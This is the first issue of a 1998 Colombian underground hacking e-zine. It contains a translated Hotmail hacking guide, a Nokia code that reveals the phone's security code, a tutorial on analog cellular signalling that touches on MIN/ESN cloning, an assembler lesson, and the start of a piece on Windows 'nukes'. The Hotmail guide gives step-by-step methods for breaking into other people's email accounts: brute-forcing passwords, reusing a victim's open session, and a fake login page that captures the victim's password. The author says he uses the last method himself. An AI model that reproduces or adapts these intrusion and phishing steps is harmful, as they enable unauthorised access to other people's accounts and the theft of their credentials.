TEMPORAL: E-zine del mundo underground en Colombia
numero I
Diciembre 1998
(18)
http://www.warez.com/users/silence
http://travel.to/silence
mr.silence@usa.net
Bueno este es el intento de e-zine en Colombia
Aportes y sugerencias bienvenidas...
NOTA: Todo lo que esta en este numero es meramente educativo, no incito a nadie a usar lo que se brinda aqui, ademas algunos de estos textos han sido copiados de otros autores y/o traducidos por mi, si un texto es tuyo y no quieres que este aqui, dimelo y lo quitare de la edicion de este numero inmediatamente
ZeD-wOrLd-EzInE
(y aplica a este e-zine...)
Contenido
- UNO. Editorial - Una corta "carta"
- DOS. Trucos - Un abrebocas
- TRES. Hack News - Guia para hackear hotmail
- CUATRO. Tutorial - Sistemas de telefonia movil celular
- CINCO. Programacion - Curso de Assembler I
- SEIS. Notas al Margen - Que le vamos a hacer es Guindows I
- SIETE. Fin - Breve Despedida
- OCHO. PGP - Llave Publica mR. sILENCE
- NUEVE. Aplicaciones - DOMSCAN.ZIP
- DIEZ. Bye - Punto Final
- Kevin.TXT - Mi aporte a la causa de Kevin Mitnick
UNO. Editorial
?Para que otro e-zine mas que hable sobre hack o sobre phreak en un momento que a todo el mundo le dio por creerse, aprender o sencillamente denominarse hacker? Digamos que a causa de una pelicula (de igual nombre) y de otras en las cuales se presenta la, entre comillas, labor de un hacker, llama la atencion esa posibilidad de poder llegar a "controlar" el mundo de la informacion que es basicamente en el mundo en que vivimos.
Todo empieza despues de leer algun texto en la red que cae de "buenas manos", como yo que debo agradecer a la conocida ISLATORTUGA y sobre todo a http://underhack.islatortuga.com ya que fueron mis primeros textos "under", recuerdo las tardes en la universidad bajando archivos y reenviandolos a mi correo electronico para poderlos leer en casa a falta de disquetes :) bueno asi era, y ahora, no puedo negarlo, estoy en las mismas :)))
Continuando con la editorial, este e-zine busca recoger inquietudes y textos desde Colombia, desde el famoso: ?Aqui si sirve una blue box? Todo con el fin de que encontremos un espacio de discusion que posibilite una conformacion de grupo, "conocernos" y bueno, porque no, compartir informacion (que creo es basicamente lo que se busca).
Unas cortas palabras que termino aqui, hago este trabajo para empezar con un e-zine como ya dije para Colombia ya que no he encontrado ninguno en la red; de todas maneras esto no quiere decir que se cierre exclusivamente a eso: no, creo que el objetivo de compartir informacion liga a muchas personas y somos parte de un grupo heterogeneo y mundial... (Algo asi como la Coca Cola) que debe estar informandose continuamente.
--FIN--
P.D. Lamento que los textos por ahora sean recopilacion de informacion de la red... Espero que para la proxima los articulos contengan informacion acerca de Colombia y tambien que ustedes me colaboren con lo que saben... (De todas formas yo no lo se todo, y espero nunca llegar a saberlo... se imaginan que aburrido)
P.D.D. El e-zine va sin tildes para que se pueda leer facilmente en cualquier editor de texto.
Mr. Silence
mr.silence@usa.net
DOS. Trucos
Bueno, esta seccion por ahora no deberia llamarse asi, pero que le voy a hacer... Para empezar con un poco de phreak, este espero sea solo una abrebocas, en proximas ediciones pondre mas informacion.
Aun hay gente que no lo sabe entonces por eso lo escribo, para programar el Nokia 2120, 2160, 6120 se presionan las siguientes teclas:
* 3 0 0 1 # 1 2 3 4 5 (menu)
De esta forma se puede acceder a informacion del celular como la programacion de NAM (linea) numero serial (y hay gente que cobra por averiguar esto) y sobre todo, (si es lo que le interesa) puede averiguar la clave de seguridad del Nokia, esta combinacion de teclas funciona aun con el telefono bloqueado... - Si el teclado esta bloqueado... * (menu) ;)
TRES. Hack News
No son exactamente noticias, solo algunos documentos que podrian ser utiles en su momento. El texto esta originalmente en ingles, asi que he intentado traducirlo... si hay algun problema con los trucos me lo hacen saber...
-----------------------------------------------------------------
980123 2.44 PM Guia para hackear Hotmail por SnEzE V.2.0
Traducido por: Mr. Silence
-----------------------------------------------------------------
Hay muchas formas de hackear Hotmail, pero solo voy a escribir las mejores. Si algunas de estas no funcionan por favor escribame a christog@hem1.passagen.se y yo evaluare si esta cometiendo algen error o si Hotmail ha cambiado algo...
Recuerde que esta informacion es solo para uso educacional y usted no debe culpar a alguien por los daños que usted haya causado. Ademas, recuerde que si alguien se da cuenta que usted ha estado leyendo su cuenta de correo, estara muy disgustado.
Bueno, ahora los hacks...
Aqui estan los que mas me gustan.
1- Fuerza Bruta hacking
- a. Use telnet para conectarse al puerto 110 (Servidor de Hotmail)
- b. Escriba USER y luego el nombre del usuario victima.
- c. Escriba PASS y luego una contraseña (password)
- d. Repita estos pasos hasta que encuentre la contraseña correcta.
!. Este es llamado Fuerza bruta hacking y requiere paciencia. Es mejor que intente diferentes contraseñas en la pagina de hotmail porque es mas rapido.
2 - La Mejor manera
- a. Tome el nombre del usuario victima (usualmente aparece en la casilla de direccion)
- b. Escriba " www.hotmail.com/cgi-bin/start/nombre_de_usuario_victima "
- c. !Usted esta adentro!
!. Este hack solo funciona si usted esta en la misma red o computador de la victima y si el no ha cerrado su cuenta (log out)
3 - La forma antigua
- a. Vaya a la pagina de hotmail y obtenga una cuenta (si usted no tiene una)
- b. Cierrela (log out)
- c. Ahora escriba el nombre del usuario victima.
- d. Mire en el codigo fuente
- e. En la quinta fila usted deberia encontrar "action=alguna_direccion"
- f. Copie esa direccion y peguela en la casilla de direcion
- g. Usted esta adentro
!. Como puede ver, es un procedimiento muy largo y la victima tiene tiempo de cerrar la cuenta.
4 - Otra...
- a. Vaya a la pagina principal de hotmail.
- b. Copie el codigo fuente
- c. Escriba un nuevo codigo HTML con el mismo codigo pero cambiando method=post a method=enter
- d. "Mire" la pagina.
- e. Cambie la direcion a http://www.hotmail.com/ (ino presione Enter!)
- f. Haga que la victima escriba el nombre de usuario y su contraseña.
- g. Mire en el campo de direccion. Ahi lo vera ...&password:algo...
!. Este es el que yo uso, porque me permite saber la contraseña. (iSi el cierra el navegador usted puede ver la contraseña en la carpeta de Historia!)
Yo he hecho un ejemplo de este truco que usted puede usar en:
hem1.passagen.se/christog/index.htm. iBuena Suerte!
iLEA!
Operadores del sistema de Hotmail han cambiado el sistema asi que la victima puede cerrar su cuenta aen si usted esta adentro. Asi que no pierda su tiempo.
Este texto se encuentra en http://hem1.passagen.se/christog/hotmail.htm
Recuerde que esta es la V.2.0.. Vendra mas...
-------------
Infortunadamente la pagina donde estaba este articulo ya fue cerrada, pero los trucos creo que todavia funcionan
En el proximo numero otras maneras de obtener la contraseña de alguien en Hotmail con JavaScript y HTML (y espero que aun funcionen, hehehe)
CUATRO. Tutorial
?Por que no comenzar en cierta medida con el tema de moda? Los telefonos celulares, este texto es del e-zine Saqueadores 11
_/_/_/_/ Sistemas de telefonia movil celular \_\_\_\_
_/_/_/_/ TMA 900-A \_\_\_\_
_/_/_/_/ \_\_\_\_
_/_/_/_/ por el Profesor Falken \_\_\_\_
AVISO: Si alguna persona con animo de conseguir pillar a alguien considera que la informacion que se recoge en el presente articulo es delito, que se compre un buen libro de telefonia.
EL AUTOR NO SE HACE RESPONSABLE DEL USO DE ESTA INFORMACION
Introduccion
En este articulo vamos a explicar en que consiste la telefonia movil celular, profundizando en el sistema TMA 900-A.
La idea de realizar este articulo nace de la practica inexistencia de informacion sobre el sistema de telefonia movil espa?ol en el ambiente under. Desde luego que existen muchos articulos en otras muchas publicaciones sobre telefonia celular, y los principios son los mismos, pero como mas adelante veremos, en Espa?a no se usa la banda de frecuencias que podemos ver en estos articulos.
De ahora en adelante hablaremos de TMA, refiriendonos a la telefonia movil automatica. (-A quien se le ocurriria lo de automatica?) :)
Algo de historia
Si, ya se que esto es una revista tecnica, y que la historia es otra cosa, y bla bla bla. Pero a veces es util conocer algo de historia.
La primera vez que se usaron servicios de radio movil, o telefonia movil, que viene a ser lo mismo, comerciales fue en los USA (y abusa) alla por los a?os 30. Por aquel entonces solo los usaba, como no, la policia.
Con el tiempo se mejoraron los sistemas de radio, apareciendo el concepto de modulacion y mejorandose posteriormente los metodos de modulacion.
-Pero de que sirve tener un terminal movil si no puedo llamar a un telefono fijo? Aqui es donde aparecen los autenticos servicios de telefonia movil, por 1946, aproximadamente. (-A alguien le recuerda algo esta fecha?) ;)
Despues de periodos de mejora de la calidad del servicio (Ja!), se automatizan los servicios, dando origen al TMA. Y se desarrollan nuevos sistemas.
Al principio, a cada terminal se le asignaba una frecuencia fija. Esto es lo que se denomina un sistema no trunking. -Os imaginais el caos que se formaria actualmente si todos los telefonos moviles tuvieran asignada una frecuencia fija?
Pues aqui es donde aparece el sistema celular.
El sistema celular
La idea principal del sistema celular se basa en la reutilizacion de frecuencias. Se define un grupo de frecuencias que pueden ser usadas por todos los terminales moviles.
Bueno, pero no es la reutilizacion de frecuencias la unica ventaja aportada por el sistema celular. En el sistema celular se definen ciertas areas limitadas en las que opera un transmisor/receptor. A partir de ahora llamaremos al tandem transmisor/receptor EB (Estacion Base).
Veamos, tenemos una EB en un area. Esta EB tiene limitada la potencia de transmision de tal forma que no salga de su area, o salga ligeramente. Ademas, esta EB tiene asignado un conjunto de radiocanales, que puede ser usado en otro area. Este conjunto de radiocanales es un conjunto de frecuencias, por si no lo sabiais. Para evitar interferencias, las EB vecinas usan conjuntos de frecuencias diferentes.
Asi tenemos un sistema que con un rango limitado de frecuencias puede manejar un numero elevado de comunicaciones. Este sistema es el sistema celular. Y si sustituis en el parrafo anterior la palabra area por celula puede que os suene mejor.
Veamoslo de forma grafica:
______ ______ En un pais multicolor,
/* \ / \ nacio una abeja bajo el sol...
/ EB \______/ EB \______ Ups, esto no tiene nada que
\ C / \ B / \ ver.
\______/ EB \______/ EB \
/ \ D /* \ A / Bueno, co?as aparte, vemos
/ EB \______/ EB \______/ que existe un EB por cada
\ B / \ C / \ celula. Ademas, aparecen
\______/ EB \______/ EB \ 4 letras, A, B, C, D. Estas
/ \ A / \ D / letras representan distintos
/ EB \______/ EB \______/ grupos de frecuencias.
\ C / \ B /
\______/ \______/
Como podemos observar, nunca coinciden dos grupos de frecuencias iguales en celulas adyacentes. Esto se hace asi para evitar interferencias. La distancia que separa dos celulas que usan el mismo set de frecuencias, como las marcadas por el asterisco, viene definida por lo que los tecnicos llaman Distancia de Reutilizacion. Esta es la distancia minima en la que no existen interferencias entre dos comunicaciones que usen la misma frecuencia.
-Que sucede si aumenta el numero de usuarios en una celula de tal forma que no quedan frecuencias libres? Muy sencillo, dividimos la celula en otras mas peque?as. Esto es lo que se llama fragmentacion celular. Para el ejemplo anterior:
______ ______
/ \ / \
/ \______/ __ \______
\ / \__/ \__/ \
\______/ __/ \__/ \ \
/ \ __/ \__/ \__/ /
/ \/ \__/ \__/ \______/
\ /\__/ \__/ \__/ \
\______/ \__/ \__/ \ \
/ \ \__/ \__/ /
/ \______/ \__/ \______/
\ / \ /
\______/ \______/
Otra mejora del servicio consiste en asignar las frecuencias, a partir de ahora canales, de forma dinamica. Estos canales podrian estar asignados de forma fija a un terminal movil (TM). De esta forma necesitariamos tantos canales en una celula como TM estan en ella.
Al realizar la asignacion de forma dinamica, se consigue una mejor optimizacion del servicio, pudiendo existir mas TM en una celula que canales pueda gestionar. Esto es lo que se denomina un sistema trunking.
Existen otros dos servicios, que aunque similares, realizan funciones distintas: el roaming (seguimiento) y el handover (traspaso). Ambos se encargan de trasladar la gestion de un TM a una celula adyacente cuando el TM se esta moviendo de una celula a otra. La diferencia esta en que el roaming se hace siempre, para tener localizado al TM permanentemente. El handover, por su parte, se produce en plena comunicacion, de forma que el usuario "no se entere" que se le ha cambiado de canal.
Para completar el sistema existen las Centrales de Telefonia Movil (CTM o MSC), que se encargan de realizar las tareas de conmutacion, interconectando las EB con la RTC (Red Telefonica Conmutada. Vamos, la que teneis en casa a menos que seais unos bichos raros con RDSI)
El sistema TMA 900-A
Despues de todo este rollo que parece pelotero a telefonica pasemos a algo mas interesante, el sistema TMA 900-A. Este es el sistema que usa telefonica en sus TM analogicos (MoviLine). Ademas, como detalle curioso, se usa tambien en algunos servicios de emergencia. Buscad, buscad y os sorprendereis. Pero antes un aviso, estos servicios de emergencia como es logico usan una codificacion por subtonos en sus sistemas de comunicacion que usan la malla trunking. Los radioaficionados ya sabran por donde voy.
Bueno, al grano. El sistema TMA 900-A esta basado en la especificacion del sistema TACS del Reino Unido, basado este a su vez en el sistema americano AMPS.
La se?al que se transmite en este sistema se encuentra modulada en frecuencia (FM) en las transmisiones de voz y tonos de supervision y modulada en FSK en la señalizacion de control. Aquellos interesados en un articulo sobre la modulacion, que lo pidan. Si interesa me lo curro.
Pero este sistema no se llama TMA 900-A porque haya 900 sistemas anteriores, o porque al que lo bautizo le dio la gana. Se llama asi por utilizar la banda de 900 MHz.
Se dispone de 1320 canales duplex (esto quiere decir que permite mantener una comunicacion bidireccional simultanea, como un telefono normal). Estos canales estan separados entre si 25 KHz. Las portadoras de emision y de recepcion correspondientes a un mismo canal se encuentran separadas a 45 MHz.
Detallemos un poco mas esta distribucion de canales.
Las portadoras de emision pertenecen a una banda de frecuencias que van desde los 884 MHz a los 917 MHz. En algunos sitios dicen que van de 890 MHz a 915 MHz, pero calculad:
915 - 890 = 25 MHz
25 MHz / 25 KHz = 1000 canales (25 KHz entre canales)
Como veis no cuadra. Y es que algunas informaciones...
Y las portadoras de recepcion se distribuyen desde los 929 MHz a los 962 MHz. Esto ultimo lo podriais haber calculado vostros:
884 MHz + 45 MHz = 929 MHz
917 MHz + 45 MHz = 962 MHz (45 MHz entre portadoras)
-Ha quedado claro?
Las EB proporcionan dos tipos de canales:
- Canal de control -> Usados para la se?alizacion en las llamadas hacia los TM. Tambien conocido por canal de llamada.
- Canales de trafico -> Son los que mantienen las conversaciones telefonicas. Pueden estar en reposo o libres. (Ya se que suena absurdo, pero luego quedara claro).
Por supuesto, ademas el sistema TMA 900-A es un sistema celular. Y como tal, Las EB deberan supervisar las comunicaciones de los TM para asegurar su calidad. Esta supervision la realizan enviando una señal piloto no audible de 4 KHz desde la EB. Esta señal es retransmitida por el TM a la EB. Cuando la señal que recibe la EB pasa por debajo de un cierto limite de intensidad la MSC ordena medidas en las centrales adyacentes para seleccionar aquella en la que el TM tiene mejor señal.
Canales en TMA 900-A
Se define como canal al camino entre el Terminal Movil (TM) y la Central de Telefonia Movil (CTM o MSC). Un canal esta compuesto de:
- Una conexion a 4 hilos entre la central MSC y la EB. -Adivinais que sistema de transmision usa esta conexion?
- Un canal de radio entre la EB y el TM, usando una frecuencia para transmision y otra para recepcion, tal y como ya se ha visto.
Asimismo podemos diferenciar los siguientes tipos de canales:
- Canales de radio -> Usados en la se?alizacion entre la MSC y los TM y en la conversacion:
- Canal de llamada (CC) -> Llamadas hacia TM.
- Canal de trafico (TC)
- Libre (free-TC) -> Llamada y conversacion hacia TM.
- reposo (idle-TC) -> Conversacion hacia TM.
- Canal combinado (CC/TC) -> Usado indistintamente.
- Canales de datos -> Solo se usan en la se?alizacion entre la EB y la MSC.
Cada EB consta con un unico CC, siendo el resto TC. Tanto el canal CC como los canales free-TC se estan identificando continuamente como tales en la zona de cobertura de la EB.
Los canales idle-TC no son operativos hasta que no sean asignados a una llamada dirigida hacia un TM.
Todos los TM cuelgan del unico CC de la EB de su zona de cobertura.
Ejemplos de procedimientos TMA 900-A
A continuacion se recogen los procedimientos que se siguen en la mayor parte de las comunicaciones por telefonia TMA 900-A. Cabe destacar que cualquier llamada dirigida a un TM se comunicara a todas las EB del area de localizacion (AL) donde se encuentra el TM. El AL lo constituyen todas las EB que cuelgan de la misma MSC donde se encuentra el TM.
Llamadas a terminales moviles
Una llamada a un TM se constituye de los siguientes pasos:
- Llamada al TM.
- Asignacion de un idle-TC al TM.
- Identificacion del TM.
- Llamada al abonado.
- Supervision.
Esquematicamente:
MSC EB TM
| | |
| Canal de llamada (CC) | Canal de llamada (CC) |
|--------------------------------->|--------------------------------->|
| Llamada (CC) | Llamada (CC) |
|--------------------------------->|--------------------------------->|
| Confirmacion (CC) | Confirmacion (CC) |
|<---------------------------------|<---------------------------------|
| Inicio de TC (TC) | |
|--------------------------------->| |
| TC Iniciado (TC) | |
|<---------------------------------| |
| Asignacion de TC (CC) | Asignacion de TC (CC) |
|--------------------------------->|--------------------------------->|
| Peticion de identificacion (TC) | Peticion de identificacion (TC) |
|--------------------------------->|--------------------------------->|
| Identificacion (TC) | Identificacion (TC) |
|<---------------------------------|<---------------------------------|
| Orden de llamada (TC) | Orden de llamada (TC) |
|--------------------------------->|--------------------------------->|
| Respuesta (TC) | Respuesta (TC) |
|<---------------------------------|<---------------------------------|
| Inicio supervision | |
|--------------------------------->| |
| Calidad de transmision (TC) | |
| | |
| Supervision iniciada (TC) | |
|<---------------------------------| |
| | |
""" """ """
Llamadas desde terminales moviles
Los pasos que constituyen una llamada desde un TM son:
- Llamada desde el TM.
- Identificar el TM.
- Marcar las cifras del abonado llamado.
- Supervision.
MSC EB TM
| | |
| Canal de llamada (CC) | Canal de llamada (CC) |
|--------------------------------->|--------------------------------->|
| Canal FREE-TC | Canal FREE-TC |
|--------------------------------->|--------------------------------->|
| | |
| Llamada (TC) | Llamada (TC) |
|<---------------------------------|<---------------------------------|
| Peticion de identificacion (TC) | Peticion de identificacion (TC) |
|--------------------------------->|--------------------------------->|
| Identificacion (TC) | Identificacion (TC) |
|<---------------------------------|<---------------------------------|
| Orden envio cifras (TC) | Orden envio cifras (TC) |
|--------------------------------->|--------------------------------->|
| Cifra 1 (TC) | Cifra 1 (TC) |
|<---------------------------------|<---------------------------------|
| Cifra 2 (TC) | Cifra 2 (TC) |
|<---------------------------------|<---------------------------------|
: : : : : : : : : : : : : : :
: : : : : : : : : : : : : : :
| | |
| Marcacion completa (TC) | Marcacion completa (TC) |
|--------------------------------->|--------------------------------->|
| Inicio supervision | |
|--------------------------------->| |
| Calidad de transmision (TC) | |
| | |
| Supervision iniciada (TC) | |
|<---------------------------------| |
| | |
""" """ """
Procedimiento de cambio de canal
Antes de explicar este procedimiento debemos recordar como funciona la supervision. La EB emite un tono no audible de 4 KHz al TM continuamente. El TM recibe la señal y la retransmite a la EB. Entonces la EB compara la relacion señal/ruido (S/N) del tono recibido con dos niveles prefijados. Si se la relacion S/N se encuentra por encima del primer nivel, la comunicacion sigue de la forma en la que estaba. Si por el encontrario, esta por debajo del primer nivel, se inicia el proceso de HANDOVER, o cambio de canal. Pero si esta por debajo del segundo nivel, simplemente se corta la comunicacion.
Los pasos que se siguen a la hora de realizar el handover son:
- La EB comunica a la MSC que la relacion S/N esta por debajo del primer nivel en el TC en uso.
- La MSC solicita una medida de la relacion S/N de la se?al en todas las EB colindantes a la anterior, y a esta misma.
- La MSC selecciona el TC de la EB con mejor relacion S/N.
- La MSC informa al TM del cambio.
- El TM se identifica en el nuevo canal.
- Supervision.
MSC EB1 EB2 TM
| | | |
| Supervision (TC) | | |
|<----------------------| | |
| Orden medida (TC) | | |
|---------------------->| | |
| Orden medida (TC) | | |
|------------------------------------------------| |
| Resultado medida (TC) | | |
|<----------------------| | |
| | Resultado medida (TC) | |
|<-----------------------------------------------| |
| Inicio de TC (TC*) | | |
|----------------------------------------------->| |
| | TC Iniciado (TC*) | |
|<-----------------------------------------------| |
| | Asignacion de TC* (TC) | |
|----------------------------------------------->|---------------------->|
| | | |
| Peticion ID (TC*) | | Peticion ID (TC*) |
|----------------------------------------------->|---------------------->|
| | Identificacion (TC*) | Identificacion (TC*) |
|<-----------------------------------------------|<----------------------|
| Inicio supervision | | |
|----------------------------------------------->| |
| Calidad de | | |
| transmision (TC*) | | |
| | Supervision | |
| | iniciada (TC*) | |
|<-----------------------------------------------| |
| | | |
| | | |
""" """ """ """
Seguimiento (Roaming)
Ya hemos explicado porque es necesario mantener controlado constantemente a un TM. Cuando un TM sale de una celula, inicia una llamada al MSC para actualizar el area de localizacion. Entonces pueden suceder dos cosas:
- El TM se encuentra localizado en un area que pertenece a la central propia. Entonces la MSC actualiza el registro de residentes inscribiendo al TM.
- El area de localizacion pertenece a otra central que no es la propia. Entonces se llama a la central propia para que actualice el registro de residentes con el nuevo MSC y el area de localizacion. Ademas, se inscribe al TM en el registro de visitantes del nuevo AL.
MSC EB TM
| | |
| Canal de llamada (CC) | Canal de llamada (CC) |
|--------------------------------->|--------------------------------->|
| | |
| Llamada de actualizacion (TC) | Llamada de actualizacion (TC) |
|<---------------------------------|<---------------------------------|
| | |
| Peticion de identificacion (TC) | Peticion de identificacion (TC) |
|--------------------------------->|--------------------------------->|
| | |
| Identificacion (TC) | Identificacion (TC) |
|<---------------------------------|<---------------------------------|
| | |
| Desconexion (TC) | Desconexion (TC) |
|<---------------------------------|<---------------------------------|
| | |
| | |
""" """ """
-Y como #$@!!?! se identifica un TM?
Pues esto es lo mas sencillo. El aparato lleva consigo un numero de serie denominado ESN, ademas de almacenar el numero telefonico asignado o MIN. De entre otros datos que se transmiten en la identificacion, estos dos son los que pueden ser mas utiles.
Y si estais pensando en hackear un telefono movil, recordad, esta informacion se refiere a telefonia analogica. No sirve p ara los moviles GSM. Sobre GSM ya hablaremos en siguientes articulos. Pero lo que os debe quedar muy claro es que hagais lo que hagais es cosa vuestra.
Seguro que pensais que con clonar, ahora que esta tan de moda, el chip del movil donde se almacena el par MIN/ESN ya podeis llamar como si del movil de otro se tratara. Bueno, esto es cierto en parte. Aparte de la identificacion, las centrales realizan otros controles. ?Os imaginais a una EB atendiendo a dos telefonos moviles en la misma celula que tengan la misma identificacion? Si el primer movil no tiene autorizado el uso de un segundo movil...
Despedida y cierre (Ta - ta - ta chan !!!)
Como habeis visto, esta informacion ha sido un poco mas orientada a que conozcais uno de los sistemas de telefonia movil usado en España que a ver como conseguir intervenir una llamada o cosas de esas. De todas formas, os aseguro que hay informacion de sobra para que si lo pensais detenidamente os deis cuenta de la inseguridad de las comunicaciones moviles, por mucho que las compañias telefonicas se empeñen en vanagloriarse de sus sistemas de codificacion (solo usados en GSM) y demas.
Ademas, si habeis leido algo de telefonia movil en otras publicaciones, sobre todo del extranjero, habreis notado que las frecuencias y algunos procesos son totalmente diferentes. Eso se debe a que la Telefonica no es tan tonta como parece, pero si es un tanto ...... bueno, mejor no decirlo que luego hay problemas, y ya se sabe.
Have P/Hun
El profesor Falken
falken@lettera.skios.es
------------------------
La pagina de el profesor Falken es: http://www.geocities.com/SiliconValley/Lakes/1707/ y de la revista Saqueadores: http://set.net.eu.org/
CINCO. Programacion
Empiezo con un curso de Assembler, extractado de la pagina de la Universidad de Guadalajara. (Primera entrega...)
Introduccion
El documento que esta visualizando tiene la funcion primordial de introducirlo a la programacion en lenguaje Ensamblador, y esta pensado en aquellas personas que nunca han trabajado con este lenguaje y probablemente con ningon otro.
El tutorial se enfoca completamente hacia lascomputadoras que operan con procesadores de la familia x86 de Intel y, considerando que el ensamblador basa su funcionamiento en los recursos internos del procesador, los ejemplos descritos no son compatibles con ninguna otra arquitectura.
Se estructuro la informacion en forma de unidades para permitir el facil acceso a cada uno de los topicos y facilitar el seguimiento del tutorial.
En la seccion introductoria se mencionan algunos de los conceptos elementales acerca de los sistemas de computo asi como del ensamblador mismo, y continoa con el tutorial propiamente dicho.
Descripcion basica de un sistema de computo.
Esta seccion tiene como finalidad dar una breve reseña de las partes principales de un sistema de computo a un nivel basico, que permita al usuario un mayor entendimiento de los conceptos que se trataran a lo largo del tutorial.
- Procesador Central
- Memoria Central
- Unidades de Entrada y Salida
- Unidades de Memoria Auxiliar
Sistema de Computo
Le llamamos sistema de computo a la configuracion completa de una computadora, incluyendo las unidades perifericas y la programacion de sistemas que la hacen un aparato util y funcional para un fin determinado.
Procesador Central
Esta parte es conocida tambien como unidad central de procesamiento o UCP. formada a su vez por la unidad de control y la unidad aritmetica y logica. Sus funciones consisten en leer y escribir contenidos de las celdas de memoria, llevar y traer datos entre celdas de memoria y registros especiales y decodificar y ejecutar las instrucciones de un programa.
El procesador cuenta con una serie de celdas de memoria que se utilizan con mucha frecuencia y que, por ende, forman parte de la UCP.
Estas celdas son conocidas con el nombre de registros. Un procesador puede tener una docena o dos de estos registros. La unidad aritmetica y logica de la UCP realiza las operaciones relacionadas con los calculos numericos y simbolicos. Tipicamente estas unidades solo tienen capacidad de efectuar operaciones muy elementales como: suma y resta de dos numeros de punto fijo, multiplicacion y division de punto fijo, manipulacion de bits de los registros y comparacion del contenido de dos registros.
Las computadoras personales pueden clasificarse por lo que se conoce como tamaño de palabra, esto es, la cantidad de bits que el procesador puede manejar a la vez.
Memoria Central
Es un conjunto de celdas (actualmente fabricadas con semiconductores) usadas para procesos generales, tales como la ejecucion de programas y el almacenamiento de informacion para las operaciones.
Cada una de las celdas puede contener un valor numerico y tienen la propiedad de ser direccionables, esto es, que se pueden distinguir una de otra por medio de un numero unico o direccion para cada celda.
El nombre generico de estas memorias es Random Access Memory (Memoria de acceso aleatorio) o RAM por sus siglas en ingles. La principal desventaja de este tipo de memoria es que los circuitos integrados pierden la informacion que tienen almacenada cuando se interrumpe la alimentacion electrica. Esto llevo a la creacion de memorias cuya informacion no se pierda cuando se apaga el sistema. Estas memorias reciben el nombre de Read Only Memory (Memoria de solo lectura) o ROM.
Unidades de Entrada y Salida
Para que una computadora nos sea otil es necesario que el procesador se comunique al exterior por medio de interfaces que permiten la entrada y la salida de datos del procesador y la memoria. Haciendo uso de estas comunicaciones es posible introducir datos para su procesamiento y la posterior visualizacion de los datos ya procesados.
Algunas de las unidades de entrada mas comunes son teclados, lectoras de tarjetas (ya en desuso), mouse, etc. Las unidades de salida mas comunes son las terminales de video y las impresoras.
Unidades de Memoria Auxiliar
Como la memoria central de una computadora es costosa y, considerando las aplicaciones actuales, muy limitada, surge entonces la necesidad de crear sistemas de almacenamiento de informacion practicos y economicos. Ademas, la memoria central pierde su contenido al apagarse la maquina, por lo que no es conveniente utilizarla para almacenamiento permanente de datos.
Estos y otros incovenientes dan lugar a la creacion de unidades perifericas de memoria que reciben el nombre de memoria auxiliar o secundaria. De estas unidades perifericas las mas comunes son las cintas y los discos magneticos.
La informacion almacenada en estos medios magneticos recibe el nombre de archivo. Un archivo esta formado por un nomero variable de registros, generalmente de tamaño fijo; los registros pueden contener datos o programas.
Ventajas del Ensamblador
La primera razon para trabajar con ensamblador es que proporciona la oportunidad de conocer mas a fondo la operacion de su PC, lo que permite el desarrollo de software de una manera mas consistente.
La segunda razon es el control total de la PC que se tiene con el uso del mismo.
Otra razon es que los programas de ensamblador son mas rapidos, mas compactos y tienen mayor capacidad que los creados en otros lenguajes.
Por oltimo el ensamblador permite una optimizacion ideal en los programas tanto en su tamaño como en su ejecucion.
Software
En terminos de computacion es todo aquel proceso o programa que utiliza los recursos de la computadora para lograr el objetivo trazado por su diseñador o programador.
Conceptos basicos
Informacion en las computadoras.
- Unidades de informacion
- Sistemas numericos
- Convertir nomeros binarios a decimales
- Convertir nomeros decimales a binarios
- Sistema Hexadecimal
Metodos de representacion de datos en una computadora.
- Codigo ASCII
- Metodo BCD
- Representacion de punto flotante
Trabajando con el lenguaje ensamblador.
- Proceso de creacion de un programa
- Registros de la UCP
- La estructura del ensamblador
- Nuestro primer programa
- Guardar y cargar los programas
- Condiciones, ciclos y bifurcaciones
- Interrupciones
Unidades de informacion
Para que la PC pueda procesar la informacion es necesario que esta se encuentre en celdas especiales llamadas registros.
Los registros son conjuntos de 8 o 16 flip-flops (basculadores o biestables).
Un flip-flop es un dispositivo capaz de almacenar dos niveles de voltaje, uno bajo, regularmente de 0.5 volts y otro alto comunmente de 5 volts. El nivel bajo de energia en el flip-flop se interpreta como apagado o 0, y el nivel alto como prendido o 1. A estos estados se les conoce usualmente como bits, que son la unidad mas pequeña de informacion en una computadora.
A un grupo de 16 bits se le conoce como palabra, una palabra puede ser dividida en grupos de 8 bits llamados bytes, y a los grupos de 4 bits les llamamos nibbles.
Derechos Reservados.1995
UNIVERSIDAD DE GUADALAJARA
Coordinacion General de Sistemas de Informacion.
------------------------
?Un poco elemental? Digamos que con algo hay que empezar y sobre todo con algo sencillo, lo siento por los avanzados.
SEIS. Notas al margen
Un poco de lo que ya todos conocemos: Windows 95 y sus bondades... (y codigo fuente de dos nukes)
Este articulo es extractado de la revista Proyecto_R que se encuentra en: http://www.bigfoot.com/~proyecto_r
QUE LE VAMOS A HACER ES GUINDOWS I
By PlaXiuS
Una vez prestando servicios a un usuario , me comento que por lo menos una vez al dia su pantalla se ponia azul con algun error medio extraño que le obligaba a resetear su equipo, cual era el problema . Yo le respondi que podian ser varios pero que lo chequearia; el usuario me contesto con tono burlezco .- pero como tantas cosas pueden ser??? a lo cual repuse.
"QUE LE VAMOS A HACER ES GUINDOWS"
Recuerdan que hace algunos dias a don Billy se le colgo el guindoze 98 en una conferencia jajaj, (para que vea don tito la mugre de software que saca al mercado), pero ya habia pasado antes en una demostracion de Guindoze NT siii vieran ustedes aquel papelon ,,,.. QUE NT ES ROBUSTO, QUE NT ES SEGURO, QUE NT AKI ALLA ... y se le cuelga en plena demostracion ... jajaja que guena ,.,,.
Bueno desgraciadamente no hay otro sistema operativo que los usuarios mortales puedan utilizar... UNIX Y LINUX NO SON FACILES; costaria bastante cambiar al simple usuario a manejar
otro entorno, ademas de la compatibilidad de softwarez de uso diario .
bueno ahora pasemos a lo que todos quieren... veamos que tan buenos son estos sistemas operativos ....
WINDOWS 95
Bueno he aki el sistema operativo reinante en estos años , veamos que tan potente es :
Primero que nada date una vuelta a Microsoft a travez de la inet y te daras cuanta que casi todos los dias sacan parches nuevos -... eso deja claro que el sistema operativo es como las weeeaas.
NUKES
Se le llama Nuke a cualquier tipo de ataque que se haga a travez de paquetes TCP/IP, a diferentes puertos, aprovechando los fallos de sistemas operativos y la docibilidad del TCP/IP ya que por ser un sistema abierto, permite cualquier tipo de cambios ;)) .
OOB Nuke
